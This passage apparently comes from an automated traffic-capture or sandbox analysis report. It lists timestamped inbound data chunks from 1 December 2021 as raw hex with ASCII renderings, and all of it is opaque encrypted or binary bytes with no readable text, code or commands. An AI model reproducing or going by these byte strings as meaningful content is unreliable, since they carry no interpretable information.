a7 Data Ascii: v0Qo)zy.g4 m~]y=6EQgWKSI, 4Vumc;7\|$mo%Qd9:YbbWP0E{Fp?Jb!Al-nZ.l@ i_wY+L\0zw\|[h*olJy)ch)/37$y[='bcC0
2021-12-01 18:25:38 UTC	107	IN	Data Raw: d0 f7 58 e8 84 a4 4a 3b f2 c8 d4 a1 1e 12 90 70 ec 0c 8e 91 91 40 71 e9 e2 22 41 5e 19 e3 ef c4 a0 be 66 3e 88 54 92 12 38 6e 38 7a 9d 3d 1e b9 db 50 95 e3 74 fa a3 14 7f 8e 7d 6a c9 ca 80 91 36 1d 7a fe 0e 54 ba 30 c1 21 ab 4c c2 f6 ed b6 24 1a ff e3 e8 e5 56 f3 a9 de d4 1b cf 05 3b e5 8e 52 65 41 09 68 6c c7 a8 e0 10 68 f7 8d 57 e4 51 c5 d2 c5 ee 1a 03 5c d2 37 81 e0 39 65 22 56 f3 1b 2b 6f 16 67 57 71 f2 a8 e3 93 93 cd 30 70 10 38 65 0d c9 1f 90 52 bf f3 f2 78 b8 74 66 04 2b 9e f7 73 c7 06 2d a1 28 ef 62 b5 6e e1 fa 76 cd e6 48 b6 ce a8 1e 73 2a d4 4f 51 d7 66 a1 8e 12 6e fa c5 cc b3 4d 1e 62 be c8 36 5a ac d6 05 05 0b db c0 46 a2 b7 e6 f0 e2 cf 1e 36 d8 46 33 76 62 47 23 49 4d ce 55 16 b1 ab 91 4b c5 af a3 6d 3e bb 15 b4 54 98 a3 f2 29 a1 1e 5b 30 9f Data Ascii: XJ;p@q"A^f>T8n8z=Pt}j6zT0!L$V;ReAhlhWQ\79e"V+ogWq0p8eRxtf+s-(bnvHs*OQfnMb6ZF6F3vbG#IMUKm>T)[0
2021-12-01 18:25:38 UTC	108	IN	Data Raw: 77 21 9a 9c 9d 6f bc 9f 4f 71 aa d9 40 12 4b 85 75 5f 93 96 ab 6f 07 85 80 4d b0 d2 e3 87 ed 8b 44 63 02 83 06 ae 29 06 78 0d 1c 05 d3 30 b9 09 0c 82 6e 34 69 4c ea 6a 10 d4 ef aa 41 99 e9 90 25 f9 bc 35 b3 3d 5e a9 1f 34 5a 49 52 b3 6d 42 e6 b0 76 f8 8f 69 5f 31 c6 27 8d b4 c1 33 cb b5 56 4c 99 8c 28 d9 15 08 05 19 ee 17 41 e7 1c 0d 52 a2 fe f8 9e 3b f0 5f fd c8 8e 0b fd 7d 4c b1 f8 cc d5 11 fe aa e1 66 2e 2d d2 36 99 f1 d0 0b 60 5e 5e b8 de c1 5a 87 9a e7 cf 5e 91 c8 34 c5 d9 81 ae 37 63 0b 33 c0 85 04 7b 02 cd e8 e0 fd 60 b2 a7 97 4d 40 bf b6 4e 07 62 97 e9 54 bc 54 6e 40 4a c5 46 40 52 e2 08 97 c4 0b 59 0e 5a 6f bf ef 53 d2 77 67 aa 46 1d 42 d3 0f 7d 5d c7 d5 53 23 a4 e5 77 22 f3 9b 51 af ee 76 a8 9e 84 c9 af 40 76 98 25 2b fa dc 61 0e be 0b a0 b2 a1 Data Ascii: w!oOq@Ku_oMDc)x0n4iLjA%5=^4ZIRmBvi_1'3VL(AR;_}Lf.-6`^^Z^47c3{`M@NbTTn@JF@RYZoSwgFB}]S#w"Qv@v%+a
2021-12-01 18:25:38 UTC	109	IN	Data Raw: 84 37 f3 67 42 3a 7f a8 65 48 91 6b 30 26 2d e8 1f 1f 90 28 f7 17 69 30 fb 23 a5 a2 cf bc a6 25 69 7a 0f 26 55 f5 85 b9 11 3e 56 30 d4 fb 02 58 36 2f 05 3a cc 8c f8 56 b5 30 70 7e ba 89 7e ac 3e 4b 36 e8 f4 33 1d d7 53 8c 7d 7c 9e 59 73 83 ab f1 d0 49 7b ae dc 23 28 26 04 ac 81 2d f7 ce 6e fb 73 6d b3 86 1d b2 c3 6e ee 75 e1 07 c4 f1 a6 b7 7a 16 f5 ad 4f 09 b6 0b 70 60 0b f5 c0 05 cd d6 d6 ff ff c1 0b 30 cb 23 50 5a 1b 74 25 2c 08 ba 72 11 a6 a1 8a 4b e5 af 91 03 7f 82 21 9e 74 c2 e5 b4 20 9d 00 34 46 98 cb 91 7e 73 6e 9c 94 9d 27 55 28 9c e1 7d e3 30 19 3e 86 29 39 2c 22 a2 13 bb 91 6f fd 3e 28 23 61 13 2c a2 6f b7 4c c3 e7 77 95 cb 5e 55 c7 29 ca dc 56 56 d2 f6 bc 2c 65 c8 25 9b c2 2b 27 9b 18 a6 d5 b7 8b 47 79 12 8b f4 ff 30 68 8d 17 43 ee 82 95 2c ff Data Ascii: 7gB:eHk0&-(i0#%iz&U>V0X6/:V0p~~>K63S}\|YsI{#(&-nsmnuzOp`0#PZt%,rK!t 4F~sn'U(}0>)9,"o>(#a,oLw^U)VV,e%+'Gy0hC,
2021-12-01 18:25:38 UTC	111	IN	Data Raw: 00 31 a6 90 60 bb 88 cb 0d e6 80 4c 0b 87 85 44 bb b3 4e 39 19 ff 17 47 e6 0f 00 67 a9 91 dc ea 29 f1 4f f4 c1 8f 2d f1 7d 5a d2 76 a3 e9 0d dd ff 92 f2 5d 2b d3 26 df 98 f2 2b 67 76 74 94 a8 8b 74 a7 f5 c7 a0 3d bf e8 30 e8 e0 ba fe 05 4d 27 5c e0 ea 67 c2 6e c8 e8 fc e8 14 18 d7 b2 45 47 ac a4 4e 37 58 90 e6 41 a9 70 21 22 fb a0 66 46 2b 3a 7c 81 d8 1e 4a 15 4b 5a ae f4 74 d6 70 75 fd 46 c4 ad 94 2b 6d 5f c7 f3 46 3d 9d f9 7f 02 f9 ba 4c c1 8f 62 d5 9a e1 bd aa 7b 43 ad 21 77 a1 9c 71 07 a0 0b b0 71 e5 22 e0 15 2d 01 08 1b 88 c1 fc c6 fb 70 cb 8b 0a 30 03 11 34 37 89 c6 07 34 e7 8f b2 85 5d 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af Data Ascii: 1`LDN9Gg)O-}Zv]+&+gvtt=0M'\gnEGN7XAp!"fF+:\|JKZtpuF+m_F=Lb{C!wqq"-p0474]&}TO!U<_G()Xbc
2021-12-01 18:25:38 UTC	112	IN	Data Raw: 85 3d 88 05 d6 93 3d ae cb 5a fe a9 e6 56 0a d6 f2 50 d7 58 18 8f 12 84 0e 4d 38 f9 33 57 e9 7a 8c bf 12 e2 26 8d 45 13 52 90 56 f6 e2 f2 e4 d1 e2 2f 17 dd 75 11 53 53 b4 bb 31 ea ae 1f 55 8b 59 08 86 c6 a8 e0 04 3b 5c 88 e8 fd 19 73 9e 44 f1 d5 7d b1 f4 b1 8f 90 fc d7 7e f5 ef 5e ba 11 54 c7 fd ee c1 0a 1a a6 a0 b3 7a 47 c5 e5 db 15 8b 75 13 da 96 f1 3f 28 c2 6d 5c 86 15 f4 93 b8 2c 51 14 8e 84 de 99 56 19 69 97 d9 d5 b5 ee d9 b2 ad 66 12 55 80 19 8f de 89 15 54 16 a7 bd d6 c9 c1 93 75 d2 1a d8 80 11 be ca 51 e1 50 f5 6e e9 79 4b 24 4a 4e 24 09 65 d2 79 77 9a a0 93 4a a1 ae 5b 9b fd e5 a8 24 db dd 28 1b 78 23 12 79 c1 82 44 d9 e4 8d 65 e5 22 b1 8a 5c f7 d3 1b 23 76 03 68 d1 2f 4a f8 0c f0 04 b5 d5 9c 5f dc 12 b8 22 20 03 c2 3b c8 18 c2 49 f3 61 58 fb 70 Data Ascii: ==ZVPXM83Wz&ERV/uSS1UY;\sD}~^TzGu?(m\,QVifUTuQPnyK$JN$eywJ[$(x#yDe"\#vh/J_" ;IaXp
2021-12-01 18:25:38 UTC	113	IN	Data Raw: 91 2f bb d7 00 58 6f cf 17 c0 2c 29 8a ff 31 34 69 b7 e4 73 ec 02 f3 6f ab a9 d6 3b 2d 4e 2c 96 3d f2 38 f2 3f 3f cd 05 eb c3 d0 5c 76 42 39 e5 16 b1 04 6b bc 17 e2 0a 71 45 6c 77 de 73 69 8b e6 55 27 17 ee 03 e8 e8 d0 f0 f5 7d f2 ce 16 e8 0e eb a3 a1 ea b8 55 11 c1 8e 7c 02 0a ca 18 be 86 0d 63 a7 e4 0f 5b 0f 37 cf 98 ac 0c 7c d8 2e 7d d6 54 b7 41 e7 25 a5 43 7c 2b 14 40 a4 19 69 6d 96 bf 28 f7 8d 8b e8 3b 2f 24 20 af f8 0c 06 7a af f0 bf 5c 5c 90 3a 2f 4e 92 8c f8 6f 47 74 72 29 69 a7 23 e8 b7 a4 81 66 38 67 80 ef 55 75 60 94 3c 0f 9f 73 63 ef 51 29 b3 f7 fc ae 15 17 5d 5e 79 53 64 3c 88 46 23 80 85 06 98 56 e5 f9 8f dc ad b3 14 72 f1 3a f2 0c 68 a0 1e a2 d7 8e ec 92 8e 90 91 cc c9 e8 e2 58 b9 5f 19 8b 57 c5 a0 f0 de 3f 88 6e 2a 13 38 da 8f 7b 9d 21 a6 Data Ascii: /Xo,)14iso;-N,=8??\vB9kqElwsiU'}U\|c[7\|.}TA%C\|+@im(;/$ z\\:/NoGtr)i#f8gUu`<scQ)]^ySd<F#Vr:hX_W?n*8{!
2021-12-01 18:25:38 UTC	114	IN	Data Raw: aa d9 ed f5 48 2c db 5a 5a 2e 0d 3d c1 08 21 86 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 90 05 25 a3 c7 4c da 60 2f 77 7c 8b 63 28 85 6e 6c 10 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 d7 2f 6a 77 6c af fc dd 1a 52 37 24 b1 9b b9 5a c3 d9 ab a0 3d f2 a4 75 a9 af ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 d8 60 4b e3 ee 5e 5a b9 93 21 75 31 1e 86 33 d0 31 71 22 20 a0 27 34 52 4a 14 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 06 1d ad 97 59 14 2f b3 a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 Data Ascii: H,ZZ.=!i_`Z%L`/w\|c(nlh+O)h/jwlR7$Z=u7cC0gn`K^Z!u131q" '4RJn8z??0Y/2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_G(
2021-12-01 18:25:38 UTC	115	IN	Data Raw: d6 1b 34 19 79 71 b9 24 c9 4d a2 da d3 3b 4c 46 a6 58 28 0f cd f4 e6 39 71 37 44 a2 6c 8e 45 ea 86 82 2a d6 f2 d9 93 94 2d c7 99 00 62 24 cc a7 f0 57 eb c2 ec 1e 12 4b 2e 20 25 f4 ce 71 5a a5 b7 2d f7 b4 d6 eb 82 93 ab 28 07 1b 37 1b 2a fd ea ef 55 c3 d2 a0 bc 70 f9 c9 84 19 d4 72 db 6e 4b d9 8a 44 f1 0c 34 46 f6 85 cc b8 c6 30 6a a3 ec 5e 03 0c c3 62 50 2d 97 0e ba 70 47 bf 1e 46 c5 5c 8a 7f d3 fe d0 9e 8e 04 ba d3 3d 2c 6e fb ec 21 83 d4 25 15 30 be 20 39 6d be b3 2e 5b 26 0a 90 a7 36 7f cd 6a 26 96 ed a5 f1 a2 c1 98 50 51 b2 7e 8f 30 1d db 76 63 10 a3 f4 24 f6 47 18 74 6f 35 87 f7 af 07 0f 35 ba ad bf 61 8e 08 bd 92 ef 3c 33 1b a7 2e 8b b5 5e ee 1b 60 52 ce 68 26 df 15 76 76 cd bb 9f 5c 19 15 ed ae e1 ce eb 6f b9 33 67 fd 46 fb dd 7a 05 b0 08 75 c2 76 Data Ascii: 4yq$M;LFX(9q7DlE-b$WK. %qZ-(7UprnKD4F0j^bP-pGF\=,n!%0 9m.[&6j&PQ~0vc$Gto55a<3.^`Rh&vv\o3gFzuv
2021-12-01 18:25:38 UTC	116	IN	Data Raw: 5a c2 98 aa a1 3c f1 a5 74 a9 b4 ef cc 36 62 42 31 8d eb 66 1b 6f 8a 9b 84 99 61 4a a2 c1 2d 28 ca f1 21 75 fd 32 4b ff 1c fd ed ee ec 6c e9 f8 9e 86 40 5d ea 4a 30 32 b6 53 e9 90 66 e0 45 42 b5 c5 f1 9d 9f d2 50 0b cb e9 b9 be bc 1e 5c 72 be b9 ae 77 65 54 88 bd a9 36 13 a0 5e d9 55 0c 18 5b ea 7e ae 1c a0 71 e6 cc 64 db b9 67 72 f2 36 87 95 aa f8 bd 95 e6 60 f1 aa 46 34 37 5a eb 4e 64 a1 25 31 c9 11 84 d2 25 69 75 6d 72 6d 5c 40 9f a3 21 92 55 98 6a 45 82 a0 e4 66 01 5f df af eb 62 3e f3 ca ec 01 39 28 9d c5 88 8c d0 c0 84 12 13 05 29 d6 96 10 ef 27 d1 e0 b1 50 34 57 89 69 9e 45 01 90 84 85 cb b3 24 03 fa a0 71 bf b7 e5 33 ea 7b 8f 26 d8 38 25 8b 0e a8 34 d4 41 5b 91 05 89 94 92 ab eb 87 b1 c1 f3 79 dc 2d 18 1e 92 28 71 65 d6 12 f0 6e d9 1d ee e2 58 bd Data Ascii: Z<t6bB1foaJ-(!u2Kl@]J02SfEBP\rweT6^U[~qdgr6`F47ZNd%1%iumrm\@!UjEf_b>9()'P4WiE$q3{&8%4A[y-(qenX
2021-12-01 18:25:38 UTC	118	IN	Data Raw: 1e 2a 3e dd c6 03 37 5a 67 a6 d3 0e 28 d2 cf 3a 24 bd 43 45 db c3 1b 58 b2 a9 e8 a3 d7 06 e9 e2 94 18 4e 7b b2 c1 79 00 b6 6b 9b c6 5c cb bc 8a 79 a4 44 c5 1b 44 2c 78 74 e5 29 a4 e9 bf f0 b5 15 30 8d a5 fa 16 8e 5d 5d ee fe b4 35 cf 52 f6 89 06 d3 cb a2 0b 2a 25 c1 9e d7 3d 53 84 d2 50 11 db 3a a2 db fe 9c dd bb 8f 37 e6 63 dd 6f 3f 82 b4 6c 7f 3f 03 0a 65 b4 08 bb 51 2a 68 53 1d af 5b d3 76 fd 08 63 ab 21 cf 50 dd 64 14 45 b6 85 d3 59 4f 9d 9e ac 2e 09 6a 5c f9 68 07 e4 07 c2 55 cd cd 01 fe 85 70 73 3e 2d e8 15 1c 55 5d e1 61 bb 09 0b db d9 bd ae 9b 5d d6 dc 2d d1 db ce 4b a8 52 a4 41 18 64 18 46 18 1c 09 55 9d e2 b3 ec c0 77 d8 cb 76 a1 af a6 f6 fb f7 b3 ce de 5f 95 4f 13 9f 44 c9 e8 ef 06 9a 7b f4 61 e6 d8 54 75 75 69 48 0f fe 9d f1 d8 2e 49 d4 da aa Data Ascii: >7Zg(:$CEXN{yk\yDD,xt)0]]5R%=SP:7co?l?eQ*hS[vc!PdEYO.j\hUps>-U]a]-KRAdFUwv_OD{aTuuiH.I
2021-12-01 18:25:38 UTC	119	IN	Data Raw: 75 d4 b9 c5 d0 87 29 1a fd 75 44 b3 b2 15 1b cc 0b a0 5f cb 23 f5 2c 23 41 48 77 ed 87 95 da be 3e aa 66 6e 75 7b 68 46 53 b8 e1 27 64 ae 51 d7 c9 11 04 9b ae 26 53 79 95 35 64 2e 3e 60 5b e8 31 9c 8e 3c 80 cf 9b c0 af 5f 6f af 8d e1 69 8f cf 82 f0 fb 28 9d e5 ca 0f a9 ee e0 1d 96 b3 40 b2 f7 2c 03 47 c7 80 82 af 71 2c 64 e0 e2 79 61 d5 b7 6b ea 5e 01 53 bb 09 11 be ff 6e fe 75 4a 9e 31 b0 38 18 a8 20 c1 90 c0 5a b1 f1 15 e9 d0 1f e0 21 a0 72 f2 de f2 0c 6c 8e 77 c6 49 05 8d b6 00 90 91 cc c9 e8 d2 58 f9 67 19 8b 57 eb c2 83 ad 3f 88 6e 2a 13 78 da 8f 17 9d 21 a6 96 ab 3e 4c 96 15 06 14 15 2f 66 ca 0b c9 18 37 be 44 ae bf 9c 2a 4a 33 31 c1 89 1c 2d 92 f6 ed 36 25 8a 43 cc 9a 83 24 90 0d 70 5a 1a cf 0c 3b e5 0e 42 65 41 89 6c 6c c7 28 f7 10 68 77 9e 57 e4 Data Ascii: u)uD_#,#AHw>fnu{hFS'dQ&Sy5d.>`[1<_oi(@,Gq,dyak^SnuJ18 Z!rlwIXgW?nx!>L/f7DJ31-6%C$pZ;BeAll(hwW
2021-12-01 18:25:38 UTC	120	IN	Data Raw: f1 d5 da 89 15 1c 75 da 81 9a 42 11 db 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7e 02 0a 39 f3 40 14 1b 44 49 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2a f6 d2 c2 03 62 f4 80 fe 32 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4b 79 78 94 45 cb 33 69 ec 1a 10 50 3e 8f 74 65 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 31 04 b9 65 4d b2 a9 61 f3 ab 00 30 af fa 47 d9 ee b7 7d 87 b5 6b 46 8c 8d 41 d5 73 73 50 29 df 1d 05 bd 49 4c Data Ascii: uBv/T%c5}K$e@0}[,SdvvPo]`z?g u]y$8Pn#8KSA, Q. mcj:7;~9@DIqQ@Q9b2("ni)yKyxE3iP>te!AH,zZ.1eMa0G}kFAssP)IL
2021-12-01 18:25:38 UTC	122	IN	Data Raw: 65 cf 9a 09 cf 45 18 1e e3 96 a8 37 69 57 62 63 f4 ac b3 44 56 02 7b a4 c6 45 14 c4 36 a4 7c 35 60 27 51 e8 e3 56 ef 08 ff 11 5f 75 3e be 03 da dd 04 29 15 5e 21 d0 d5 47 e8 fc 2e e3 33 01 8d 87 8b 79 50 48 b8 95 f6 0c 2d 67 de 12 84 92 dd 40 bc c6 04 74 15 1d 00 56 4c ec d4 ca ba 48 61 af 64 c7 25 70 f0 e1 05 b6 b7 6c 1d 2b ed c3 49 00 90 bf 69 4e dc c9 18 37 1b 42 f9 91 72 61 46 01 d8 89 0a 61 a1 c2 7f a9 92 00 85 c5 76 e8 f0 56 78 64 40 5b c8 8d 87 fa 24 e6 5f 46 83 02 bd ad 2d 36 74 f2 69 b6 77 48 61 11 c3 ca 40 bc 79 04 36 5a 6a eb e1 52 14 48 52 2d df 95 eb df 0b 58 35 82 48 cf 16 c1 b8 27 f5 d9 cf ce 66 d9 b4 2a d6 6d e8 56 fc 71 50 d1 bb ab 9e f7 73 2c d3 07 69 5d 0a a7 94 30 a6 5d 1d 8d 63 81 ee c1 2b 52 f9 67 d6 79 96 da b0 1f 8f 12 05 a7 c4 cc Data Ascii: eE7iWbcDV{E6\|5`'QV_u>)^!G.3yPH-g@tVLHad%pl+IiN7BraFavVxd@[$_F-6tiwHa@y6ZjRHR-X5H'f*mVqPs,i]0]c+Rgy
2021-12-01 18:25:38 UTC	123	IN	Data Raw: d2 47 5d 95 11 7b c9 24 88 d6 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 50 53 a4 03 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 77 7c 8b 5b 28 85 6e 6c 20 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 21 75 31 fe 87 33 d0 31 21 22 20 a0 25 Data Ascii: G]{$8Pn#8KPS, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Nw\|[(nl h+O)h/jBn37$Z=u7cC0gn`K,)!u131!" %
2021-12-01 18:25:38 UTC	124	IN	Data Raw: 5f 92 cf 73 d1 2b 26 55 72 94 e7 6e 37 1c 32 f6 85 62 de c0 31 9f 7e 0d 6f 30 22 34 7f 7e 36 47 2f ed 38 67 6f 23 f9 ed ff 1e f1 56 15 dd ba d5 cc 28 ca cd b6 34 ec 4c fd ac f0 56 79 ad 4a 54 3a cf 1c 01 64 32 62 65 51 fc 61 2d 44 d1 f3 6c 83 c9 9f 57 e4 d1 5d d0 f6 98 81 47 78 4a 64 7e 37 3c e7 2d d3 15 4a 68 91 9d 17 73 7d 2d fd b8 18 f6 90 f2 5c 10 37 95 f3 c6 40 3f 60 40 14 21 5d a8 a7 32 20 24 19 0b 73 c7 c2 8d 16 ab 8f d8 b4 7e b2 71 f2 b5 f3 48 a6 45 50 2b 0e 0e c6 fd e6 54 04 08 8f 02 7b 62 41 64 b2 f0 0f e9 f8 f4 dd 59 49 2c 0c 80 cb d4 44 8c a5 b7 a4 38 c5 92 e5 8c 74 16 ad fb e4 be 13 6d 4d fd de 5a 75 51 09 2a 8a cf 39 27 fa 0b 67 db 36 7a 99 a6 af f2 e7 7a 4e 9c c8 4e 5f 30 1b 8f 78 a3 7a 27 19 7d d0 3c 86 18 b1 2b a2 68 3b 6e cc 91 78 d7 c7 Data Ascii: _s+&Urn72b1~o0"4~6G/8go#V(4LVyJT:d2beQa-DlW]GxJd~7<-Jhs}-\7@?`@!]2 $s~qHEP+T{bAdYI,D8tmMZuQ*9'g6zzNN_0xz'}<+h;nx
2021-12-01 18:25:38 UTC	125	IN	Data Raw: 95 9f 82 cf 82 28 32 6e ef 03 d4 a2 71 13 4a f0 3c 6c ba de 6f 49 ec 0a fb 4d c2 2c 19 54 bb 8d 5e 6e 80 62 ec ab f3 dd c8 cd 44 1c db 6a e2 5e 1f 3b d1 cf 64 7e 36 04 81 d8 42 9e 07 82 90 e8 43 6f 5f 2e 95 e8 a8 a6 1d 78 d1 54 24 7d 2d 74 4e 24 a5 6e 7c ab 96 02 22 df 84 1c 2a b6 12 a7 bf 1c 4e 2d 5f c9 57 f7 97 dc 5e 8b 92 7e 95 a2 4e ff 98 ac e5 76 cb a9 90 77 92 9d 4a ae 28 48 38 78 fb 71 20 f0 03 46 36 ea 04 35 83 5c 26 1e 04 8b f0 85 10 27 42 5c d5 3c 09 cb e0 71 8a 24 fa a7 33 c0 59 29 03 20 b0 da 41 aa b5 1d dc 96 6e 28 10 7f 57 cd 90 30 b7 6e 0d 76 8e 77 ad 5e 14 e8 d0 a6 b4 12 4f e4 1c 55 aa 35 f8 15 af fe d7 e9 21 08 bd e9 29 97 85 6c 82 d6 42 15 e0 fd b3 70 67 a2 57 1e 01 46 4e bc f4 05 82 1c 97 9a 0e aa f6 e6 30 96 cb 71 c3 89 ff 06 0e a4 f0 Data Ascii: (2nqJ<loIM,T^nbDj^;d~6BCo_.xT$}-tN$n\|"*N-_W^~NvwJ(H8xq F65\&'B\<q$3Y) An(W0nvw^OU5!)lBpgWFN0q
2021-12-01 18:25:38 UTC	127	IN	Data Raw: ab cc b6 a7 09 0c 03 5c 16 16 81 e0 91 11 22 56 5d dc f3 0f 62 32 73 43 72 a3 e3 93 7f ef 30 70 04 ba ca 0c e7 36 5b 32 cb fc 79 4a b8 24 c9 05 ab bc f7 73 f7 c2 82 a0 06 66 a9 d5 1a 2c 71 43 cd e6 48 b6 7e 4c a2 72 fe d6 f2 50 f9 d9 79 ee 66 e5 62 f2 cc a7 f0 1f 62 8e c8 36 46 c2 6a 04 2b 69 a8 b3 46 a5 b7 a4 b3 d0 b6 6e 22 9c 23 50 2a 69 44 25 2a 4d fe 26 55 c3 d2 e1 5f ca df c6 83 7e d7 72 f5 54 82 a5 f9 60 c1 5e 34 46 f6 c9 67 39 14 3f e9 f1 ef 5e 03 49 f0 94 fc 84 48 4e 1a a6 48 3b fe 65 c5 5c cb f4 01 b6 5b 51 66 19 32 0f c2 6d e5 09 a4 a8 07 f0 a5 15 30 be 6c b2 9d 56 19 d0 a4 d9 4b 20 a6 50 f6 89 6a 7d de 60 af f6 da 89 59 3f 75 da 6f b8 42 11 db 55 2f 9b f3 f3 54 be e6 06 e6 63 09 a4 c4 7d 4b 24 f2 2a 66 2b 65 b4 f0 12 9e d5 7d 0b 1f af 83 98 af Data Ascii: \"V]b2sCr0p6[2yJ$sf,qCH~LrPyfbb6Fj+iFn"#PiD%M&U_~rT`^4Fg9?^IHNH;e\[Qf2m0lVK Pj}`Y?uoBU/Tc}K$*f+e}
2021-12-01 18:25:38 UTC	128	IN	Data Raw: 48 e2 83 90 11 51 08 12 05 9d 07 76 78 36 d8 eb 76 9a a6 52 89 90 cb ad 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 21 75 31 fe 87 33 d0 31 21 22 20 a0 25 34 52 4a 08 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3a 60 27 da 2d 22 be ff 6e fe 15 6e 9e 31 d8 38 Data Ascii: HQvx6vR/jBn37$Z=u7cC0gn`K,)!u131!" %4RJn8z??0FY/2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_G()Xbcqd@aaE:`'-"nn18
2021-12-01 18:25:38 UTC	129	IN	Data Raw: a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 9e 6a e3 dd 97 47 ef 9f d7 72 db 15 31 9e 17 3f 79 d5 34 47 f6 c9 30 b1 97 c5 e8 fe 6a 42 02 49 f0 dd 91 fd 40 06 b3 c2 6c 6b 3f ce 96 7c f8 2f 40 0f 5a 50 66 19 0c a5 86 49 c5 6c 97 68 4f 7d b0 5e 20 be 6c fa 5a 97 18 d0 a4 59 c0 db 59 45 5a 86 4e 5e 5b a0 fe 50 52 89 15 1c 3d 51 cd be 12 59 56 f2 0b 63 e7 d0 54 f6 43 61 c2 4b 7d 0a d1 a6 44 24 f2 6f 91 c0 2d 3d 1c 14 be 90 4e cb e0 ba d1 94 fd a1 a9 93 96 e7 41 80 eb 9c 14 76 76 40 1b dd 90 d7 d3 6f e2 c5 ee 9f 36 a0 6f 2b 70 4f 04 da ff c1 b2 40 fe 35 88 5f 02 c2 9a 11 79 81 a9 0c e4 c0 09 50 f9 cf 88 ae 57 aa 7c e5 f1 86 c2 6c 77 84 be 0d 68 94 82 20 5a 05 ed 58 66 f4 ef f3 ae 73 08 ba 6d 2b Data Ascii: b6ZjFnB#P7WIiUjGr1?y4G0jBI@lk?\|/@ZPfIlhO}^ lZYYEZN^[PR=QYVcTCaK}D$o-=NAvv@o6o+pO@5_yPW\|lwh ZXfsm+
2021-12-01 18:25:38 UTC	130	IN	Data Raw: cf 78 3b 97 0e 2d 65 2d 89 4c 6c 97 28 96 10 06 77 fb 57 88 d1 ea d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 fc 10 c1 2c a3 e3 93 13 c0 30 70 10 46 ca 0c c9 a3 1f 53 bf 61 5b 79 b8 63 8a 51 67 9e e7 73 c7 84 83 a0 28 21 b9 d1 16 39 71 1a a3 e6 48 b6 ce 6e 82 72 2a 86 f2 50 d7 9e 74 eb 73 f0 27 e0 f9 a7 f0 1f 62 ee e8 36 5a 6e 6a 04 05 25 a9 a4 27 d1 d6 a4 b3 6c 96 6e 42 60 23 50 04 35 45 33 28 1d af 33 2f b9 a8 85 5d ed df c6 03 87 f6 72 db 1e f1 d7 9a 6a 89 08 55 32 97 c9 c3 2b 36 3f e9 6d cd 5e 03 67 95 f0 79 d2 29 4e 3e 4a 0c 3b 7e 6f c5 5c cb da 68 d2 3a 25 07 3d 76 2c c2 6d e5 dd e0 